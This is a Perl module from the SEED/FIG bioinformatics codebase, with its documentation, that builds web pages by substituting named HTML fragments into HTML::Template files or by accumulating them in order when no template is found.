#legions -------------------------------------------------------------------------------- O F T E N I M I T A T E D N E V E R D U P L I C A T E D -------------------------------------------------------------------------------- L E G I O N S O F T H E U N D E R G R O U N D n :. E% ___ _______ ___ ___ :"5 z % | | (_______) | | | | :" ` K ": | | | | | | | | | | z R ? %. | | | | | | | | | | :^ J ". ^s | |___ | |___| | | |___| | f :~ '+. #L |_____|[] \_____/[] \_____/[] z" .* '+ %L z" .~ ": '%. .# + ": ^%. .#` +" #: "n .+` .z" #: ": z` +" %: `*L z" z" *: ^*L z* .+" "s ^*L z# .*" #s ^%L z# .*" #s ^%L z# .r" #s ^%. u# .r" #i '%. u# .@" #s ^%u# .@" #s x# .*" x#` .@%. x#` .d" "%. xf~ .r" #s "%. u x*` .r" #s "%. x. %Mu*` x*" #m. "%zX" :R(h x* "h..*dN. u@NM5e#> 7?dMRMh. z$@M@$#"#" *""*@MM$hL u@@MM8* "*$M@Mh. z$RRM8F" [knowledge is key] "N8@M$bL 5`RM$# 'R88f)R 'h.$" #$x* -------------------------------------------------------------------------------- All mention of LoU, Legions of the Underground, Legions, KV, or Keen Veracity, copyright (c) 2000-2005 legions.org, all human rights reserved outside the US. -------------------------------------------------------------------------------- [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU] W W W . L E G I O N S . O R G [LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
http://packetstormsecurity.org/files/40484/kv14.txt.html
crawl-003
refinedweb
9,152
63.29
Each Answer to this Q is separated by one/two green lines. I’m trying to get a pretty print of a dictionary, but I’m having no luck: >>> import pprint >>> a = {'first': 123, 'second': 456, 'third': {1:1, 2:2}} >>> pprint.pprint(a) {'first': 123, 'second': 456, 'third': {1: 1, 2: 2}} I wanted the output to be on multiple lines, something like this: {'first': 123, 'second': 456, 'third': {1: 1, 2: 2} } Can pprint do this? If not, then which module does it? I’m using Python 2.7.3. Use width=1 or width=-1: In [33]: pprint.pprint(a, width=1) {'first': 123, 'second': 456, 'third': {1: 1, 2: 2}} You could convert the dict to json through json.dumps(d, indent=4) import json print(json.dumps(item, indent=4)) { "second": 456, "third": { "1": 1, "2": 2 }, "first": 123 } If you are trying to pretty print the environment variables, use: pprint.pprint(dict(os.environ), width=1) Two things to add on top of Ryan Chou’s already very helpful answer: - pass the sort_keysargument for an easier visual grok on your dict, esp. if you’re working with pre-3.6 Python (in which dictionaries are unordered) print(json.dumps(item, indent=4, sort_keys=True)) """ { "first": 123, "second": 456, "third": { "1": 1, "2": 2 } } """ dumps()will only work if the dictionary keys are primitives (strings, int, etc.) The answers/resolutions are collected from stackoverflow, are licensed under cc by-sa 2.5 , cc by-sa 3.0 and cc by-sa 4.0 .
https://techstalking.com/programming/python/pprint-dictionary-on-multiple-lines/
CC-MAIN-2022-40
refinedweb
258
74.79
. select ascii('ü') select replace('aosidmfüasdfom', 'ü', 'X') with a table it would be: select replace(fieldvalue', 'ü', '') from tablen. create function dbo.replace_extended_char ( @char char(1) ) returns char(1) as begin return ( select case when ascii(@char) < 127 then @char else case @char when 'Ç' then 'C' when 'ö' then 'o' when 'ä' then 'a' when 'Ö' then 'O' else '?' end end ) end go Then you need "driver code" that sends each extended character (only) to the function. More on that later if needed :-) . The normal "printable" characters range from 32 to 126 inclusive - before that you have carriage returns, tabs, line feeds etc... It goes up to 255 in the Ansi character set, so, there is potentially 255-126 characters to be checked. Ouch. The challenge will be what codeset, language, binaries are being used, or, are you assuming just ascii characters and the English language are being used. In which case, using physical character representations as acperkins does above will work OK... In which case, first step is to create a character map... Normally create a table for that : create table uCharMap (AsciiNumber int primary key, AsciiCharacter char(1), Printable char(1)) GO declare @int int set @int= 127 while @int < 256 begin insert uCharMap (AsciiNumber,AsciiCharacte set @int = @int + 1 end GO then open the table and manually decide the most appropriate characters to substitute (csv is included for one prepared earlier) ... Then can do the function business (created below) as part of a select, or update or what ever e.g. select dbo.ufix_characters('ABCDe Open in new windowucharmap.csv.txt I want to run it on a table called products, on a field called name for all possible replacements. Thanks! First you test it with select name as oldname, dbo.ufix_characters(name) as newname from products then if you are happy... update products set name = dbo.ufix_characters(name) Could probably add in a "where" clause - something like a pattern match (patindex) for characters not in the range of 0-9 and A-Z, but if a once off job, just choose a quite time... But test first !!
https://www.experts-exchange.com/questions/23809769/How-to-find-and-replace-characters-like-etc.html
CC-MAIN-2018-17
refinedweb
353
62.27
Handling Paginated Resources in Ruby Wrap your paginated collections in Enumerable goodness The thing with paginated data is we can't get it all at once. Let's say we're using the Trello API. There are a number of Trello endpoints that return paginated data sets, such as boards, lists, cards, and actions (like comments, copies, moves, etc). If we're querying for Trello cards marked as completed each month since last January, for example, we may need to request several pages of "cards" In most cases, Trello will provide a default limit, typically 50, on the number of resources returned in a single request. But what if you need more than that? In this post, we'll examine a few ways to collect paginated results in Ruby. Trello World The Trello developer docs provide a quickstart in javascript - here's the unofficial Ruby version. While logged into your Trello account (you'll need one first), retrieve your app key. We won't need the "secret" for this article. Next, you'll generate an app token. Paste the following URL into your browser with your app key subsituted for the placeholder. Now that we have an app key and token, we can make authenticated requests to the Trello API. As a quick test, paste the following url with your own key and token as pararameters into your web browser (or use curl) to read your member data. You should see a JSON response with attributes like your Trello id, username, bio, etc. Script mode Now let's fetch some paginated data in Ruby. For the following examples, we'll be using Ruby 2.2. To make HTTP requests, we'll also use the http.rb, but feel free to subsitute with your HTTP client of choice. Install the gem yourself with gem install http or add it to your Gemfile: # Gemfile gem "http" To make things easier for the remainder, add the key and token as environment variables in your shell. For Mac/Linux users, something like this will work: # command line export TRELLO_APP_KEY=your-key export TRELLO_APP_TOKEN=your-token Now, let's run Ruby version of our Trello World test. # trello_eager.rb require "http" def app_key ENV.fetch("TRELLO_APP_KEY") end def app_token ENV.fetch("TRELLO_APP_TOKEN") end url = "{app_key}&token=#{app_token}" puts HTTP.get(url).parse If it worked correctly, you should see the same result we saw in your browser earlier. Let's extract a few helpers to build the url. We'll use Addressable::URI, which is available as a dependency of the http.rb gem as of version 1.0.0.pre1 or otherwise may be installed as gem install addressable or gem "addressable" in your Gemfile: require "http" require "addressable/uri" def app_key ENV.fetch("TRELLO_APP_KEY") end def app_token ENV.fetch("TRELLO_APP_TOKEN") end def trello_url(path, params = {}) auth_params = { key: app_key, token: app_token } Addressable::URI.new({ scheme: "https", host: "api.trello.com", path: File.join("1", path), query_values: auth_params.merge(params) }) end def get(path) HTTP.get(trello_url(path)).parse end Let's Paginate Now we'll add an alternative method to #get that can handle pagination. MAX = 1000 def paginated_get(path, options = {}) params = options.dup before = nil max = params.delete(:max) { 1000 } limit = params.delete(:limit) { 50 } results = [] loop do data = get(path, { before: before, limit: limit }.merge(params)) results += data break if (data.empty? || results.length >= max) before = data.last["id"] end results end Given a path and hash of parameter options, we'll build up an array of results by fetching the endpoint and requesting the next set of 50 before the last id of the previos set. Once either the max is reached or no more results are returned from the API, we'll exit the loop. As a starting point, this works nicely. We can simply use paginated_get to collect up to 1000 results for a given resource without the caller caring about pages. Here's how we can grab the all the comments we've added to Trello cards: def comments(params = {}) paginated_get("members/me/actions", filter: "commentCard") end comments #=> [{"id"=>"abcd", "idMemberCreator"=>"wxyz", "data"=> {...} ...}, ...] The main problem with this approach is that it forces the results to be eager loaded. Unless a max is specified in the method call, we could be waiting for up to 1000 comments to load - 20 requests of 50 comments each - to execute before the results are returned. Stop, enumerate, and listen Next step is to refactor our paginated_get method to take advantage of Ruby's Enumerator. I previously described Enumerator and showed how it can be used to generate infinite sequences in Ruby, including Pascal's Triangle. The main advantage of using Enumerator will be to give callers flexibility to work with the results including filtering, searching, and lazy enumeration. # trello_enumerator.rb def paginated_get(path, options = {}) Enumerator.new do |y| params = options.dup before = nil total = 0 limit = params.delete(:limit) { 50 } loop do data = get(path, { before: before, limit: limit }.merge(params)) total += data.length data.each do |element| y.yield element end break if (data.empty? || total >= MAX) before = data.last["id"] end end end We've got a few similarities with our first implementation. We still loop over repeated requests for successive pages until either the max is reach or no data is returned from the API. There are a few big differences though. First, you'll notice we've wrapped our expression in Enumerator which will serve as the return value for #paginated_get. Using an enumerator may look strange but it offers a huge advantage over our first iteration. Enumerators allow callers to interact with data as it is generated. Conceptually, the enumerator represents the algorithm for retrieving or generating data in Enumerable form. An enumerator implements the Enumerable module which means we can call familiar methods like #map, #take, and so on. Instead of building up an internal array of results, enumerators provide a mechanism for yielding each element even though a block may not be given to the method (how mind blowing is that?). Now we can use enumerator chains to doing something like the following, where we request comment data lazily, transform the API hash to comment text and select the first two addressed to a colleague. comments.lazy. map { |a| a["data"]["text"] }. select { |t| t.start_with?("@personIWorkWith") }. take(2).force We may not need to load all 1000 results to because the enumerators chain is evaluated for each item as it is yielded. This technique provides the caller with a great deal of flexibility. Eager loading can be delayed or avoided altogther - a potential performance gain. Here are magic lines from #paginated_get: data.each do |element| y.yield element end The y.yield is not the keyword yield, but the invokation of the #yield method of Enumerator::Yielder, an object the enumerator uses internally to pass values through to the first block used in the enumerator chain. For a more detailed look at how enumerators work under the hood, read more about how Ruby works hard so you can be lazy. A cursor-y example Let's do one more iteration on our #paginated_get refactoring. Up to this point, we've been using a "functional" approach; we've just been using a bunch of methods defined in the outermost lexical scope. First, we'll extract a Client responsible for sending requests to the Trello API and parsing the responses as JSON. # trello_client.rb require "http" require "addressable/uri" class Client def initialize(opts = {}) @app_key = opts.fetch(:app_key, ENV.fetch("TRELLO_APP_KEY")) @app_token = opts.fetch(:app_token, ENV.fetch("TRELLO_APP_TOKEN")) end def get(path, params = {}) HTTP.get(trello_url(path, params)).parse end private def trello_url(path, params = {}) auth_params = { key: @app_key, token: @app_token } Addressable::URI.new({ scheme: "https", host: "api.trello.com", path: File.join("1", path), query_values: auth_params.merge(params) }) end end Next, we'll provide a class to represent the paginated collection of results to replace our implementation of #paginated_get. The Twitter API uses cursors to navigate through pages, a concept similar to "next" and "previous" links on websites. Although Trello doesn't provide explicit cursors in their API, we can still wrap the paginated results in an enumerable class to get similar behavior. # trello_cursor.rb require_relative "./trello_client" class Cursor def initialize(path, options = {}) @path = path @params = params @collection = [] @before = params.fetch(:before, nil) @limit = params.fetch(:limit, 50) end end The Cursor will be initialized with a path and params, like our paginated_get. We'll also maintain an internal @collection array to cache elements as they are returned from Trello. class Cursor private def client @client ||= Client.new end def fetch_next_page response = client.get(@path, @params.merge(before: @before, limit: @limit)) @last_response_empty = response.empty? @collection += response @before = response.last["id"] unless last? end MAX = 1000 def last? @last_response_empty || @collection.size >= MAX end end We'll introduce a dependency on the Client to interface with Trello through the private client method. We'll use our client to fetch the next page, append the latest results to our cached @collection and increment the page number. Now for the key public method: class Cursor include Enumerable def each(start = 0) return to_enum(:each, start) unless block_given? Array(@collection[start..-1]).each do |element| yield(element) end unless last? start = [@collection.size, start].max fetch_next_page each(start, &Proc.new) end end end We've chosen to have our Cursor expose the Enumerable API by including the Enumerable module and implementing #each. This will give cursor instances enumerable behavior so we can simply replace our paginated_get definition to return a new Cursor. def paginated_get(path, params) Cursor.new(path, param) end def comments(params = {}) paginated_get("members/me/actions", filter: "commentCard") end Let's break down Cursor#each a bit further. The first line allows us retain the Enumerator behavior before. return to_enum(:each, start) unless block_given? It invokes Kernel#to_enum when no block is given to an each method call. In this case, the method returns an Enumerator that packages the behavior of #each for an enumerator chain similar to before: puts comments.each.lazy. map { |axn| axn["data"]["text"] }. select { |txt| txt.start_with?("@mgerrior") }. take(2).force For more info on using #to_enum, check out Arkency's Stop including Enumerable, return Enumerator instead. We also need to yield each element in the @collection to pass elements to callers of #each Array(@collection[start..-1]).each do |element| yield(element) end We iterate from the start of the collection to the end with Array(@collection[start..-1]).each... but wait! when we start iterating, the @collection is empty: def initialize # ... @collection = [] end Wat? The key comes in the lines that follow in #each: unless last? start = [@collection.size, start].max fetch_next_page each(start, &Proc.new) end Unless we've encountered the last page, we fetch the next page, which appends the latest results to the collection and we recursively invoke #each with a starting point. This means #each will be invoked again with new results until no new data is encountered. Sweet! A neat trick is how we forward the block given to #each. When we Proc.new without explicitly passing a block or proc object, it will instantiate with the block given to its surrounding method if there is one. The behavior is similar to the following: def each(start = 0, &block) # ... each(start, &block) # ... end The main benefit being we don't needlessly invoke Proc.new by omitting &block in the arguments. For more on this, read up on Passing Blocks in Ruby without &block "Recursive each" is a powerful technique for providing a seamless, enumerable interface to paginated or cursored results. I first encountered this approach in the sferik's Twitter gem - a great resource for those considering writing an API wrapper in Ruby. On your own Give it a shot! Pick out an API you like to use and play with techniques for modeling its collection resources. This is a great way to get more experience with Ruby's Enumerable. Consider one of these approaches when you need to traverse paginated or partitioned subsets of data in an external or internal API. Think less about pages and more about data. Changelog 2016-01-28 - Updated the examples to use the :beforeparameter instead of :pagefor requests for successive "pages" - Posted the full source of the examples above on GitHub Credits Icons via the Noun Project:
https://rossta.net/blog/paginated-resources-in-ruby.html
CC-MAIN-2018-47
refinedweb
2,058
58.08
Writing Apache's Logs to MySQL Pages: 1, 2, 3 Querying the Database Queries can run on the database immediately. The examples below are in straight SQL syntax. Some use the nested query syntax available only in MySQL 4.1 or above. If you intend to write automated scripts in Perl or Python or whatever, it may be easier to run multiple SELECT statements or to compute derived values inside the scripting language itself. Whenever you request reports on web server performance, you'll need to specify the date range you want to cover. Query: total bytes in and out You want to find out how much network traffic your web server sends and receives. Keep in mind that this reflects traffic levels only at the application layer of the TCP/IP stack. It won't record the size of TCP or IP packets. That's a question SNMP polling tools can answer better. select sum(bytesin), sum(bytesout) from blackbox \ where datetime = curdate(); select sum(bytesin),sum(bytesout) from blackbox where datetime >= date_sub(curdate(),interval 7 day); The first example gives the total bytes in and bytes out for the given day. The second example gives the total for the past seven days. Query: what percentage of hits goes to RSS syndication pages compared with HTML pages? This example checks the number of hits against a specific RSS page against every possible hit against the server. select (select count(url) from blackbox where url regexp '\.rss$')/ (select count(url) from blackbox where url regexp '\.html$'); RSS hits are typically automated. Because of this, a lot of sites have a higher percentage of pure robot/agent traffic on their site than they may have had two years ago. By checking the RSS hits, you can determine whether the agent traffic is overwhelming your site. Query: how often do users skip the Flash animation? If you see a web site with one of those Flash animations on the main page, it usually has a "Skip" link at the bottom. If you're going to include one, throw in a meaningless query string at the end of the link, so you can determine which hits are redirects after the animation has finished and which ones come from people clicking on the link. select (select count(url) from blackbox where url="/home.html?skipped"), (select count(url) from blackbox where url="/home.html"), Verifying that the database is working Here's a two-part script you can run to verify that the database really is logging hits from the servers. First, add this script to the cgi-bin directory of every web site that uses mod_log_mysql. #!/usr/local/bin/perl # returnid.pl use strict; use warnings; print("X-ServerId: $ENV{'SERVERID'}\n"); print("X-UniqueId: $END{'UNIQUE_ID'}\n"); print "Content-type: text/plain\n\n"; print("Server id is $ENV{'SERVERID'}\n"); print("Unique id is $ENV{'UNIQUE_ID'}\n"); exit 0; The server will return its serverid and unique ID for that particular hit. The next program will act as an HTTP client. It will retrieve this URL, then connect to the database and search the logs for the unique ID. #!/usr/local/bin/perl # checkid.pl # # Pragmas # use strict; use warnings; # # Includes # use LWP::UserAgent; use HTTP::Request; use HTTP::Response; use DBI; # # Global Variables # use vars qw/$Url $Agent $Db $ServerId $UniqueId /; use constant { DSN => "DBI:mysql:database=apachelog", DBUSER => "logwriter", DBPASS => "logpass", QUERYSTRING => "select datetime,uniqueid from blackbox where uniqueid=? and serverid=?", DEFAULTURL => "", }; # # Subroutines # sub getId { my ($agent,$url) = @_; my $request = HTTP::Request->new(GET => $url); my $response = $agent->request($request); if ($response->is_success) { my $serverid=$response->header("X-ServerId"); my $uniqueid=$response->header("X-UniqueId"); print("Unique ID from server is $uniqueid\n"); print("Server ID is $serverid\n"); return ($serverid,$uniqueid); } return undef; } sub findId { my ($db,$serverid,$uniqueid) = @_; my $query = $db->prepare(QUERYSTRING); $query->execute($uniqueid,$serverid); if (my ($dt,$uid)=$query->fetchrow_array()) { print("Database recorded $uid at $dt\n"); } else { print("Can't find a database record for unique-id $uniqueid\n"); } return; } # # Main Block # # Initialize the user agent $Agent = LWP::UserAgent->new(); # Initialize the database client $Db = DBI->connect(DSN,DBUSER,DBPASS); # URL $Url = shift || DEFAULTURL; if (($ServerId,$UniqueId) = getId($Agent,$Url)) { findId($Db,$ServerId,$UniqueId); } else { print("Unable to get data from webserver"); exit 1; } If you run this program at a regular polling interval, it will warn you when the remote database is not responding or if the Blackbox table is not recording hits from the web servers. Final Thoughts If you've read the first article, you should already understand why you want to log your server performance data. The core concepts are still the same; I'm just introducing a few variations on improving the process. The two new logging directives provide more flexibility with virtual hosting environments. It also allows having just one Blackbox log file for each running server. If you want to take the really big step, consider the option of writing your logs straight to a database. The initial setup process may be complex, but after that there is a huge administrative benefit. It's an ideal solution for dealing with large server farms. Chris Josephes works as a system administrator for Internet Broadcasting. Return to the Apache DevCenter.
http://www.onlamp.com/pub/a/apache/2005/02/10/database_logs.html?page=3&x-order=date&x-maxdepth=0
CC-MAIN-2013-48
refinedweb
884
60.35
Line Plots using Matplotlib - Mar 4 • 3 min read - Key Terms: line plot, datetime Import Modules import matplotlib.pyplot as plt from datetime import datetime % matplotlib inline Generate a Simple Line Plot We call the plot method and must pass in at least two arguments, the first our list of x-coordinates, and the second our list of y-coordinates. plt.plot([1, 2, 3, 4], [1, 2, 3, 4]); We plotted 4 points with a line connected through them. Generate a Line Plot from My Fitbit Activity Data More often, you'll be asked to generate a line plot to show a trend over time. Below is my Fitbit activity of steps for each day over a 15 day time period. dates = ['2018-02-01', '2018-02-02', '2018-02-03', '2018-02-04', '2018-02-05', '2018-02-06', '2018-02-07', '2018-02-08', '2018-02-09', '2018-02-10', '2018-02-11', '2018-02-12', '2018-02-13', '2018-02-14', '2018-02-15'] steps = [11178, 9769, 11033, 9757, 10045, 9987, 11067, 11326, 9976, 11359, 10428, 10296, 9377, 10705, 9426] Convert Strings to Datetime Objects In our plot, we want dates on the x-axis and steps on the y-axis. However, Matplotlib does not allow for strings - the data type in our dates list - to appear as plots. We must convert the dates as strings into datetime objects. Code Explanation We'll first assign the variable dates_list to an empty list. We'll append our newly created datetime objects to this list. We'll iterate over all elements in our original dates list of string values. For each item in our list, we'll access the strptime method in our datetime module and pass in two arguments. The first argument is our date - an item in our list. The second argument is the datetime format. Notice how our dates originally provided are in the format year-month-day with zero-padded month and day values. This means the 2nd of the month is 02 rather than just 2. Therefore, we must tell this strptime method this format with Y for year, m for month and d for day. dates_list = [] for date in dates: dates_list.append(datetime.strptime(date, '%Y-%m-%d')) We can preview the syntax of our first datetime object. dates_list[0] datetime.datetime(2018, 2, 1, 0, 0) Our elements are of type datetime from the datetime module. Therefore, the type is datetime.datetime. type(dates_list[0]) datetime.datetime Plot Line Plot of New Data plt.figure(figsize=(10, 8)) plt.plot(dates_list, steps); In order to see more of the variation in steps per day, by default, Matplotlib labels the smallest x-tick at 9500 instead of simply 0. I also called the figure method and passed in a larger than normal figure size so we could easily see the y-tick values.
https://dfrieds.com/data-visualizations/line-plots-python-matplotlib
CC-MAIN-2019-26
refinedweb
481
71.55
Raspberry Pi Controlled Codebug With I2C Introduction. Set up Tethered mode For Tethered mode you need to load your CodeBug with a special project file. This is downloaded to CodeBug just the same as a regular user program (refer to the download guide for details). Download this I2C Tether mode project and load it onto your CodeBug. Fitting CodeBug to Raspberry Pi Look out!Never connect the Micro USB or use a battery with CodeBug while it is fitted to a Raspberry Pi. CodeBug connects straight to Raspberry Pi’s GPIO header through CodeBug’s expansion connector. While your Pi is disconnected from power, align CodeBug to the pins shown in the diagrams below and gently push CodeBug’s connector onto the GPIO pins. Choose your matching Raspberry Pi model If you are still unsure which Raspberry Pi GPIO pins to connect CodeBug to, note the pin labels on the back of CodeBug, and connect these to the corresponding pins on your Raspberry Pi. You can now power up your Raspberry Pi. Enable Raspberry Pi I2C First, make sure you have enabled I2C by opening a Terminal window and running sudo raspi-config And then choose Advanced Options > I2C then select Yes for both questions. Python libraries for Raspberry Pi You must now install the Python libraries that will talk to your CodeBug using the I2C GPIO pins. In your Terminal window, type sudo apt-get update sudo apt-get install python3-codebug-i2c-tether Test with an example Creating Tethered CodeBug programs You can write your own Tethered CodeBug programs using Python and a few simple commands to control your CodeBug. In the next steps you will start an interactive Python session and enter commands to interact with your tethered CodeBug. Open a Terminal and type python3 You will see the python prompt appear >>>. Now import the CodeBug I2C library by entering import codebug_i2c_tether cb = codebug_i2c_tether.CodeBug() cb.open() cb.set_pixel(2,2,1) You will see the center LED light up on CodeBug.. Write text on the CodeBug’s LEDs, using the command cb.write_text(0, 0,'A') An A will appear on the CodeBug LEDs To write scrolling text on the CodeBug’s LEDs, first import the time module: import time You can now scroll text using the commands:. Press Crtl D to exit Python. What next? You can get a full list of the commands available by typing the following into your interactive Python shell, with the codebug_i2c_tether library imported. help(codebug_i2c_tether.CodeBug) Write long programs for Tethered mode CodeBug by writing commands in your text editor and saving and running the file in the way you did with the examples earlier, (python yourfile.py). Tethered mode gives your CodeBug access to the full computing power, functionality and network connectivity of your Raspberry Pi! Make the most of the variety of powerful yet easy to use Python modules allow your CodeBug to generate random numbers, create email alerts or even post to Twitter!
https://www.codebug.org.uk/learn/activity/62/raspberry-pi-controlled-codebug-with-i2c/
CC-MAIN-2021-39
refinedweb
497
59.94
Petal::Cookbook - Recipes for building templates with Petal This document contains some examples of Petal template usage. Most of these examples deal with using Petal to generate HTML files from HTML templates. When using Petal for web application development, your templates should not need to be accessible by the webserver. In fact, it could be a security risk if they are available since there may be code or comments which users should not see prior to processing by Petal. Thus, it is recommended to store your templates in a non-web accessible directory. Personally I prefer to place the directory outside of the web root but you could also use permissions or .htaccess files to control access to the directory. This directory path should go into the $Petal::BASE_DIR global setting or the 'base_dir' argument for the new() constructor. Petal is indifferent about the name of the template files. Personally, I like to name my templates with the .tmpl extension to help myself and designers distinguish templates from static html. Some GUI editors, though, will not open files without a htm/html extension (esp. under Windows). If you are getting a parse_error when trying to process your template, you will need to clean up your XHTML template in order for Petal to process it. Two tools will be of great assistance in taking the step towards better standards compliance--HTML Tidy () and xmllint. In addition, you can use the page validation services at W3C (). Alternatively, you could use the Petal::Parser::HTB module which will parse non well-formed HTML documents using HTML::TreeBuilder. HTML Tidy will rewrite your document into valid XHTML and, if requested, even replace legacy formatting tags with their CSS counterparts. You can safely ignore the warnings about proprietary attributes. Be sure to read the output of what HTML Tidy is doing or else you may find it removing important tags which it thinks are empty or invalid (e.g., inline elements outside of a block). One of the important options that should be set is output_xhtml (-asxhtml from the command-line). Here's an example of how to use it (see the documentation for complete details): tidy --asxhtml original_file.html > new_file.html Once your document is well-formed, you can use xmllint to do day-to-day checking that it stays well-formed without having to wade through the warnings that HTML Tidy will generate about proprietary attributes. The following command will check that a document is well-formed: xmllint --noout <filename> To prevent errors about undefined namespace prefix, be sure to include these in your template like so: <html xmlns="" xmlns: You may receive errors from xmllint about unknown entities such as . These can be safely ignored, though you can use the numeric version   instead to keep xmllint happy. If you find a way to suppress these warnings, please let us know. In the meantime, you can pass the output through grep to ignore these bogus warnings:. xmllint --noout tmpl/contact_info.tmpl >& grep -v 'Entity' Now you have no excuse for not creating well-formed XHTML documents. An effective way to collate data to send to the Petal process command is via a hash reference. Used as follows, this technique allows you to build up your data to be passed to the template slowly: my $hash = { string => 'Three', 'number' => 3 }; $hash->{'foo'} = "bar"; my $template = new Petal ( 'test.tmpl' ); my $html = $template->process($hash); # Output the results print "Content-type: text/html\n\n"; print $html; One way to use tal:repeat is to create an a reference to an array of anonymous hashes. Here is an example: my $array_ref= [ { firstname=>"David", surname=>"Lloyd" }, { firstname=>"Susan", surname=>"Jones" } ]; With this array you can use the tal:repeat structure. Let's say you have this template - this is a snippet so don't forget the proper name space declarations and such: <table> <tr> <th>First Name</th> <th>Last Name</th> </tr> <tr tal: <td tal:First Name</td> <td tal:Last Name</td> </tr> </table> If you processed that template and the method call "list_of_names" returned an array reference as described above, you'd get: <table> <tr> <th>First Name</th> <th>Last Name</th> </tr> <tr> <td>David</td> <td>Lloyd</td> </tr> <tr> <td>Susan</td> <td>Jones</td> </tr> </table> So, in a tal:repeat construct: tal:repeat="tal_variable_name EXPRESSION" tal_variable_name is the name of the variable you use in your tal template to refer to each row of data you are looping through. EXPRESSION should return an array reference, where each row is an anonymous hash, array, scalar or object. You can then refer to the members of the anonymous hash like this: "$tal_variable_name/key_from_hash" Up until now, if I wanted to use petal to pre-select an item in a selectbox, I would have to do each item twice, like so: <select> <div petal: <option petal:Option 1</option> <option petal:Option 2</option> </div> </select> $VAR1 = [ { value => 1, label => 'Option 1', selected => 1 }, { value => 2, label => 'Option 2', selected => 0 }, { value => 4, label => 'Option 3', selected => 0 }, ]; After reading the Petal source, I found that if you use petal:attributes to assign an attribute an undefined value, the attribute gets omitted, thus the above code can be replaced with the simpler version below: <select> <option petal:Option 1</option> </select> $VAR1 = [ { value => 1, label => 'Option 1', selected => 1 }, { value => 2, label => 'Option 2' }, { value => 4, label => 'Option 3' }, ]; It turns out that although not documented in Petal's documentation, this behavior is part of the TAL specification: Thanks to Fergal Daly for his knowledge of the TAL specification. I developed a decode: modifier that works similar to Oracle's decode statement. It provides an if/then/else construct and is part of the Petal::Utils collection of modifiers. Using decode, it is possible to make even/odd rows of a table different classes, which allows you to do things like alter color, font-size, etc, is relatively easy. Example: <table> <tr tal: <td tal:Employee Name</td> ... </tr> </table> See Petal::Utils for more information. Alternatively, this can be done entirely with TAL (contributed by Jonathan Vanasco): <div tal: <tag tal:<tag tal:</tag> <tag tal:<tag tal:</tag> <div tal: This will use either the rowEven or rowOdd class. All of the 'tag' elements are omitted on render. This uses a nested define tag in a condition tag, because define precedes condition in order of operations. </div> <div> The simplest way to do odd/even rows may to duplicate the code entirely for each type or row, though this may cause maintenance headaches: <table> <tr tal: <td tal:Employee Name</td> <td tal:Employee Name</td> ... </tr> </table> Petal supports the ability to call an object's methods if passed in to Petal::process via the %hash. Say you wish to check whether a particular record is contained in a recordset returned from an SQL query. Using OO-Perl techniques, you could use the following technique as described by Jean-Michel: Let's say that the database table looks like this: Raters (id, first_name, last_name, relation, phone, email) You could bless each record into a package as is: use MyApplication::Record::Rater; my @records = complicated_query_somewhere_else(); bless $_, "MyApplication::Record::Rater" for (@records); $hash->{'records'} = \@records; Your module could look like that: package MyApplication::Record::Rater; use strict; use warnings; use CGI; use Carp; sub is_current_id { my $self = shift; my $cgi = CGI->new; my $id = $cgi->param ('rater.id'); return unless (defined $id and $id and $id =~ /^\d+$/); return $id == $self->{id}; } 1; Then on top of your existing data, you have a method which you can call from Petal, i.e. <ul petal: <li petal:Current id</li> </ul> This trick can also be used when you have foreign keys in database fields. <fictious_scenario> For example, let's imagine that you have a column called 'friend_id'. It references another 'rater' which is supposed to be a friend of that person. You could define the following subroutine: # give me the friend record for that person sub friend { my $self = shift; my $friend_id = $self->{friend_id}; my $sql = 'select * from rater where id = ?'; my $sth = $::DBH_CONNECTION->prepare_cached ($sql); $sth->execute ($friend_id); my $hash = $sth->fetchrow_hashref; return unless (defined $hash); bless $hash, "MyApplication::Record::Rater"; return $hash; } Then in your template, you could do: <div petal: Your friend is: <span petal:First Last</span> </div> </fictious_scenario> Thanks to Jean-Michel Hiver for this tip. If you are doing a lot of database manipulation via Petal, you probably should consider an object-relational mapping library . Personally, I recommend Class::DBI. There is a list of many of these tools at Perl Object Oriented Persistence (). Calling the HTML generating methods of CGI.pm from the Petal template provides an extremely simple means to develop forms. For example, the ususal ratnest of loops used to populate a checkbox group can be replaced by the simple and elegant construct below. You can put in a dummy checkbox to give the HTML designer something to look at. Be sure to call CGI with the -compile option as follows: use CGI qw(-compile [:all]); $hash->{'query'} = new CGI; $hash->{'choices'} = [1, 2, 3, 4]; <span petal: <input name="Choices" type="checkbox" value="test">Test</input> </span> Thanks to Kurt Stephens for this tip. This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.. William McKee <william@knowmad.com>. Thanks to the following contributors: Jean-Michel Hiver, Kurt Stephens, Warren Smith, Fergal Daly. Petal, Petal::Utils, the test file t/084_Cookbook.t and the test template t/data/cookbook.html.
http://search.cpan.org/~bpostle/Petal-2.19/lib/Petal/Cookbook.pod
CC-MAIN-2016-36
refinedweb
1,612
57.61
Parent Directory | Revision Log Fixed missing headers in non-template mode. #! TemplateObject; use strict; use Tracer; use PageBuilder; use FIG_CGI; use FigWebServices::SeedComponents::Framework; =head1 Template Object Manager =head2 Introduction The template object manager is used to build HTML in the presence or absence of a template. The constructor looks for a template and remembers whether or not it found one. To add HTML to the object, you call the L</add> method with a variable name and the HTML to add. The example below puts the results of the C<build_html> method into the template C<$to> with the name C<frog>. $to->add(frog => build_html($thing)); Once all the HTML is added, you call finish to generate the web page. print $to->finish(); If no template exists, the HTML will be output in the order in which it was added to the template object. If a template does exist, the HTML assigned to each name will be substituted for the variable with that name. Sometimes extra text is needed in raw mode. If you code $to->add($text); the text is discarded in template mode and accumulated in raw mode. If you're doing complicated computation, you can get a faster result using an IF construct. $to->add(build_html($data)) if $to->raw; This bypasses the call to C<build_html> unless it is necessary. The template facility used is the PERL C<HTML::Template> facility, so anything that follows the format of that facility will work. The most common use of the facility is simple variable substition. In the fragment below, the variable is named C<topic>. <p>This page tells how to do <TMPL_VAR NAME=TOPIC>. If the following call was made at some point prior to finishing $to->add(topic => "subsystem annotation"); The result would be <p>This page tells how to do subsystem annotation. Almost all templates are stored in files. Some are stored in the server's file system and some are stored on remote servers. Regardless of the location, a template file name consists of a base name,. The following constructor starts the template for the protein page. my $to = TemplateObject->new($cgi, php => 'Protein', $cgi->param('request')); If the CGI object indicates Sprout is active, the template object will look for a template file at the C<$FIG_Config::template_url> directory. If no template URL is specified, it will look for the template file in the 